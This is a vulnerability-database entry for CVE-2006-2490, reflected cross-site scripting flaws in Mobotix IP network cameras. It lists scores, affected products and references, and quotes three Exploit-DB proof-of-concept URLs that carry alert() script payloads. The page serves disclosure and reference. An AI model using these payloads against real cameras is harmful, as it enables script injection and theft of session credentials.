CVE-2006-2490
published 2006-05-19CVE-2006-2490: Multiple cross-site scripting (XSS) vulnerabilities in Mobotix IP Network Cameras M1 1.9.4.7 and M10 2.0.5.2, and other versions before 2.2.3.18 for M10/D10…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.88%
85.1th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Mobotix IP Network Cameras M1 1.9.4.7 and M10 2.0.5.2, and other versions before 2.2.3.18 for M10/D10 and 3.0.3.31 for M22, allow remote attackers to inject arbitrary web script or HTML via URL-encoded values in (1) the query string to help/help, (2) the get_image_info_abspath parameter to control/eventplayer, and (3) the source_ip parameter to events.tar.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting
exploitdb·2006-05-17
CVE-2006-2490 obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18022/info
The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal
Exploit-DB
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting
exploitdb·2006-05-17
CVE-2006-2490 obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18022/info
The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
Exploit-DB
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting
exploitdb·2006-05-17
CVE-2006-2490 obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting
obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18022/info
The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
No writeups or analysis indexed.
http://secunia.com/advisories/20151http://securityreason.com/securityalert/929http://securitytracker.com/id?1016128http://www.attrition.org/pipermail/vim/2006-August/000980.htmlhttp://www.eazel.es/media/advisory001.htmlhttp://www.osvdb.org/25621http://www.osvdb.org/25622http://www.osvdb.org/25623http://www.securityfocus.com/archive/1/434289/100/0/threadedhttp://www.securityfocus.com/archive/1/444018/100/0/threadedhttp://www.securityfocus.com/bid/18022http://www.vupen.com/english/advisories/2006/1857https://exchange.xforce.ibmcloud.com/vulnerabilities/26538http://secunia.com/advisories/20151http://securityreason.com/securityalert/929http://securitytracker.com/id?1016128http://www.attrition.org/pipermail/vim/2006-August/000980.htmlhttp://www.eazel.es/media/advisory001.htmlhttp://www.osvdb.org/25621http://www.osvdb.org/25622http://www.osvdb.org/25623http://www.securityfocus.com/archive/1/434289/100/0/threadedhttp://www.securityfocus.com/archive/1/444018/100/0/threadedhttp://www.securityfocus.com/bid/18022http://www.vupen.com/english/advisories/2006/1857https://exchange.xforce.ibmcloud.com/vulnerabilities/26538
2006-05-19
Published